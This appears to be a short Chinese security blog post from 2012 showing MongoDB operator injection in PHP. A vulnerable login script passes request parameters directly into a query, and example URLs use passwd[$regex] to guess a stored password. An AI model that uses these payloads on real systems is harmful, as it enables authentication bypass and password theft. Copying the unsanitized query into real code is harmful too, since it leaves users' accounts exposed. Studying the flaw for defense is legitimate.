mongo+php 注射的一個tips from superhei

2012-07-17 23:50:00

<?php

$con = new Mongo();

$db = $con->selectDB("demo")->selectCollection("admin");

var_dump($_GET['passwd']);

$ds =$db->find(array("username"=>$_GET['username'],"password"=>$_GET['passwd']));

foreach($ds as $k=>$v){

var_dump($v);

}

<a href="http://localhost/mongo/go-1.php?username=heige&passwd%5B%24regex%5D=%5E1">http://localhost/mongo/go-1.php?username=heige&passwd[$regex]=^1</a>

<a href="http://localhost/mongo/go-1.php?username=heige&passwd%5B%24regex%5D=%5E2">http://localhost/mongo/go-1.php?username=heige&passwd[$regex]=^2</a>

測試的資料庫結構：

> db.admin.find()

{ "_id" : ObjectId("4f562d110920d897e6765ae1"), "uid" : 1, "username" : "heige", "password" : "123456" }

{ "_id" : ObjectId("4f5b38ba0920d897e6765ae2"), "uid" : 2, "username" : "admin", "password" : "admin" }

這樣的注射方式主要利用了PHP的特點，可以直接送出array 。。。

另外參考老外的2個tips：

php 資料安全/隐私保護資料庫資料隐私保護大資料管理隐私保護大資料隐私保護管理隐私保護 mongo指令行

上一篇: metasploitable 2 測試筆記

下一篇: 搜尋框注入

繼續閱讀

艱難安裝LDAP,SSL認證
協定 ssl schema manager 伺服器 tomcat 資料庫
08-07
Apache配置SSLApache配置SSL
伺服器 php apache openssl ssl
08-07
《Linux指令行與Shell腳本程式設計大全第2版.布盧姆》pdf
shell 資料庫運維
08-07
MySQL的4種隔離級别？出現問題
軟體開發 mysql 資料庫
08-07
配置apache支援PHP（win7）
apache httpd-conf php
08-07
XX系統實施過程問題總結
資料庫網絡
08-07
無元件上傳圖檔到資料庫中，最完整解決方案
資料庫 function header 照片 border file
08-07
【MySQL資料庫】資料庫索引事務1.索引2.事務
資料庫
08-07
neo4j之cypher使用文檔
資料庫 java sql mysql 正規表達式
08-07
Cloud Studio初體驗
Python ruby php
08-07
NOSQL安全攻擊
php 資料庫大資料
08-07
mybatis_入門程式Mybatis入門
java 資料庫
08-07
php 去掉字元串的最後一個字元及截取原字元串1,2,3,4,5,6,
php
08-07
登入plsql 報錯 the account is locked --使用者被鎖
資料庫
08-07
php——水印
php 備忘水印
08-07
SequoiaDB巨杉資料庫C++驅動概述
巨杉資料庫學習資料庫 c++
08-07